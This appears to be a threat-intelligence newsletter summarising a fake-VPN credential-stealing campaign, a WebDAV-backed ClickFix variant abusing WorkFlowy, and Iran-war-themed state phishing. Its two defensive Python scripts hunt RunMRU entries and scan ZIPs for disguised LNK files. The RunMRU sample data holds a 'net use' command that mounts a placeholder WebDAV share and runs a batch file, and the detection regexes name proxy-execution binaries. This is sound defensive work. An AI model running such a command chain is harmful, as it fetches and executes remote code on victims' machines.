Trending Topics
Fake VPN Clients Distributed Through SEO Poisoning Campaign
Microsoft has uncovered a credential-stealing campaign that uses fake VPN clients to compromise enterprise credentials. The campaign, attributed to the threat actor Storm-2561, uses SEO poisoning to lure users into downloading malicious VPN installers hosted on attacker-controlled websites. Disguised as trusted enterprise software, these trojans are digitally signed and distributed through ZIP files intended to appear legitimate. Observed since mid-January 2026, this campaign builds on earlier attacks documented by Cyjax and Zscaler, in which users searching for popular VPN software such as Ivanti Secure Access, SonicWall, or Hanwha Vision were redirected to fake sites via Bing search results. The malicious installers deploy a variant of the Hyrax information stealer that captures VPN credentials via a counterfeit sign-in screen. Victims are then shown an error message and sometimes redirected to the genuine vendor site to maintain the illusion of legitimacy. According to Microsoft, the malware achieves persistence by abusing the Windows RunOnce registry key and uses a certificate from a compromised company to appear authentic. The company has since revoked the certificate and taken down the malicious GitHub repositories used in distribution. Microsoft advises organizations to enable multi-factor authentication, verify software authenticity, and avoid downloading installers from unofficial sources to mitigate future credential theft campaigns.
ClickFix Evolves: WorkFlowy Electron App Abused in New WebDAV-Backed Campaign
Atos researchers have uncovered a new ClickFix variant that abuses the Windows Win+R shortcut to trick users into running a “net use” command that mounts an attacker-controlled WebDAV share and executes a batch script from a mapped network drive. The script downloads a ZIP archive, unpacks a trojanized copy of the legitimate WorkFlowy Electron desktop app, and runs it with malicious code injected into the app’s app[.]asar archive, turning WorkFlowy into both a C2 beacon and a dropper. This variant notably bypassed Microsoft Defender for Endpoint and was only detected through targeted threat hunting that focused on suspicious execution chains originating from the RunMRU registry key, a hallmark of ClickFix activity. Inside the modified WorkFlowy bundle (version 1.4.1050), attackers replaced the main.js entry point with heavily obfuscated code that runs before any legitimate logic and effectively blocks normal application functionality while executing with full Node.js privileges outside the Chromium sandbox. The malware continuously beacons to a C2 domain, tags each victim using an ID stored in %APPDATA%\id[.]txt, and can receive base64-encoded payloads, write them to %TEMP%, and execute any delivered binaries. This ClickFix evolution is significant because it shifts away from commonly monitored tools like PowerShell, MSHTA, and WScript, instead abusing native networking utilities and WebDAV to deliver malware via seemingly normal filesystem operations. The attack chain demonstrates how threat actors can hide behind trusted applications and native OS features, reducing noisy indicators and shrinking the detection surface for automated tools. As ClickFix campaigns continue to adopt proxy execution techniques and trusted app abuse, organizations will need to combine strict browser- and script-control policies with proactive, hypothesis-driven threat hunting to surface weak behavioral signals early in the intrusion lifecycle.
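The RunMRU hunting angle described above, written out as a small triage script. This is an added example, not code from Atos or from the original article. What Windows itself does is fixed: the Run dialog records each command under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU as letter-named string values with a trailing "\1", and the MRUList value gives their order, most recent first. Everything else here is constructed for the example: the sample key contents, the hostname files.example.invalid, the drive letter, and the scoring heuristic, which flags the "net use" plus WebDAV plus mapped-drive batch chain this variant uses and, for older ClickFix lures, the usual scripting and proxy-execution binaries.

```python
import re

# Constructed sample of a RunMRU key, in the shape winreg.EnumValue would hand
# back: letter-named values ending in "\1", MRUList ordering them newest-first.
# Hostname and share are placeholders, not real indicators.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "cmd\\1",
    "b": "notepad\\1",
    "c": "net use Z: \\\\files.example.invalid@SSL\\DavWWWRoot\\share /persistent:no & Z:\\update.bat\\1",
}

# "net use" typed into the Run dialog: rare for ordinary users, core to this variant.
NET_USE = re.compile(r"\bnet(?:\.exe)?\s+use\b", re.I)
# WebDAV targets: \\host@SSL\..., \\host@443\..., \\host\DavWWWRoot\..., or a bare URL.
WEBDAV_PATH = re.compile(r"\\\\[^\\\s]+@(?:SSL|\d+)\\|\\\\[^\\\s]+\\DavWWWRoot\\|https?://", re.I)
# A .bat/.cmd launched from a drive letter, e.g. Z:\update.bat.
DRIVE_BATCH = re.compile(r"\b[A-Z]:\\[^\s&|]*\.(?:bat|cmd)\b", re.I)
# Classic ClickFix proxy-execution tooling, kept so older lures are still caught.
PROXY_BINS = re.compile(
    r"\b(powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|curl)\b", re.I
)


def parse_runmru(values):
    """Return (letter, command) pairs newest-first, with the "\\1" suffix stripped."""
    entries = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        entries.append((letter, cmd))
    return entries


def score_command(cmd):
    """Return the list of reasons a Run-dialog command looks like a ClickFix chain."""
    reasons = []
    mounts_share = bool(NET_USE.search(cmd))
    if mounts_share:
        reasons.append("net use from Run dialog")
    if WEBDAV_PATH.search(cmd):
        reasons.append("WebDAV / @SSL / DavWWWRoot path")
    if mounts_share and DRIVE_BATCH.search(cmd):
        reasons.append("batch executed from freshly mapped drive")
    if PROXY_BINS.search(cmd):
        reasons.append("scripting/proxy-execution binary")
    if "&" in cmd or "|" in cmd:
        reasons.append("command chaining")
    return reasons


def hunt_runmru(values):
    """Score every recorded Run command; return only those with at least one reason."""
    findings = []
    for letter, cmd in parse_runmru(values):
        reasons = score_command(cmd)
        if reasons:
            findings.append({"value": letter, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in hunt_runmru(SAMPLE_RUNMRU):
        print(f"[{hit['value']}] {hit['command']}")
        for r in hit["reasons"]:
            print("    -", r)
```

On a live host, read the key with winreg.OpenKey and winreg.EnumValue into the same dict shape and pass it to hunt_runmru; across a fleet, the same heuristics map directly onto the registry or process-creation telemetry an EDR already collects, which is where the hypothesis-driven hunt the article describes would actually run.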
Iran War Becomes Prime Lure for State-Backed Phishing Campaigns
Multiple state‑aligned threat actors, including TA453, TA473, TA402, and several still‑developing clusters (UNK_InnerAmbush, UNK_NightOwl, UNK_RobotDreams), are weaponizing breaking news about the Iran war to run highly targeted phishing campaigns against governments and policy organizations across the Middle East and beyond. These operations mix classic espionage with credential theft and malware delivery, often abusing compromised government email accounts, consumer freemail, and trusted cloud platforms like Google Drive, Outlook Web App lookalikes, and spoofed OneDrive portals to increase credibility and bypass defenses. Many lures reference recent events such as Operation Epic Fury, rumored leadership deaths, Gulf energy infrastructure threats, or “Gulf Security Alert” warnings, frequently redirecting victims through convincing decoy documents or conflict‑tracking sites after harvesting credentials to reduce suspicion. China‑linked UNK_InnerAmbush, Pakistan‑aligned UNK_RobotDreams, and Middle East–focused TA402 have all used conflict‑themed emails and geofenced delivery to push loaders, Cobalt Strike beacons, and Rust‑based backdoors under the guise of photos, PDF briefings, or official alerts. Infrastructure and techniques include links to archives with LNK files masquerading as JPGs, DLL sideloading via signed binaries, fake Adobe Reader buttons that lead to malware installers, and phishing portals that closely mimic OWA authentication pages hosted on attacker‑controlled or compromised domains. Belarus‑aligned TA473 (Winter Vivern) has run parallel campaigns against European and Middle Eastern government entities using likely compromised infrastructure to pose as EU officials, underscoring the broader geopolitical interest in the conflict’s fallout. 
Amid this surge, TA453 (Charming Kitten / APT42) continues its hallmark slow‑burn espionage approach, using carefully crafted personas and benign documents to build trust with high‑value policy targets before pivoting to credential harvesting pages branded as legitimate cloud file portals. Across all observed activity, the Iran war serves both as a powerful social engineering pretext and as a driver of shifting collection priorities, with some actors using the crisis mainly as a topical cover for ongoing intelligence requirements and others clearly expanding efforts to gather sensitive information on Middle Eastern governments and diplomatic channels. For defenders, this wave highlights the need to treat conflict‑related content as high‑risk by default, tighten controls on cloud and webmail access, and invest in behavioral detection and threat hunting to spot abuse of trusted services rather than relying solely on static indicators.
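One of the delivery tricks listed above, archives containing LNK files masquerading as JPGs or PDF briefings, lends itself to a simple content-based check at the mail gateway or sandbox. The script below is an added example, not part of the original report. Two things in it are fixed facts about the format: a Windows Shell Link file begins with a 4-byte HeaderSize of 0x4C and the LinkCLSID 00021401-0000-0000-C000-000000000046, and Explorer hides the .lnk extension by default, so "IMG_0002.jpg.lnk" displays as "IMG_0002.jpg". The archive contents, member names and the set of decoy extensions are constructed for the example.

```python
import io
import zipfile

# Shell Link header: HeaderSize 0x0000004C (little-endian) followed by LinkCLSID
# 00021401-0000-0000-C000-000000000046 in its on-disk GUID byte order.
LNK_MAGIC = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")

# Extensions a lure would want the victim to see (constructed list for this example).
DECOY_EXTS = {".jpg", ".jpeg", ".png", ".gif", ".bmp", ".pdf", ".doc", ".docx"}


def looks_like_lnk(data):
    """True if the bytes start with the Shell Link header, whatever the file is called."""
    return data[: len(LNK_MAGIC)] == LNK_MAGIC


def extensions_of(name):
    """Return the lower-cased extension chain of an archive member, e.g. ['.jpg', '.lnk']."""
    base = name.rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    return ["." + p for p in parts[1:]]


def classify_member(name, data):
    """Return the list of reasons a member looks like a disguised shortcut (empty if clean)."""
    reasons = []
    exts = extensions_of(name)
    if len(exts) >= 2 and exts[-1] == ".lnk" and exts[-2] in DECOY_EXTS:
        reasons.append("double extension: decoy name ending in .lnk")
    if looks_like_lnk(data):
        reasons.append("content is a Windows Shell Link (LNK header)")
        if not exts or exts[-1] != ".lnk":
            reasons.append("LNK content under a non-.lnk name")
    return reasons


def scan_zip_bytes(blob):
    """Inspect every file in a ZIP held in memory and return the suspicious members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            # Only the first 20 bytes are needed for the header check, but the
            # constructed members are tiny, so reading whole files is fine here.
            data = zf.read(info.filename)
            reasons = classify_member(info.filename, data)
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def build_sample_zip():
    """Constructed sample archive: one genuine image plus two disguised shortcuts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("photos/IMG_0001.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 32)  # JPEG SOI marker
        zf.writestr("photos/IMG_0002.jpg.lnk", LNK_MAGIC + b"\x00" * 60)       # hidden .lnk
        zf.writestr("briefing.pdf", LNK_MAGIC + b"\x00" * 60)                   # LNK bytes, .pdf name
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_zip_bytes(build_sample_zip()):
        print(hit["name"])
        for r in hit["reasons"]:
            print("    -", r)
```

The content check is the one that matters: the double-extension test is cheap but only catches the lazy case, while the header test flags a shortcut even when the name carries no .lnk at all, which is the situation the reader of a "photo" attachment is least equipped to notice.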
Top CVEs of the Week
As part of our ongoing vulnerability monitoring, the following CVEs highlight recent security issues that could affect a range of systems, applications, and devices. These findings reflect the constantly evolving threat landscape and reinforce the importance of timely patching, secure configurations, and proactive security practices. Below is a summary of notable vulnerabilities, including their impact and any available remediation guidance.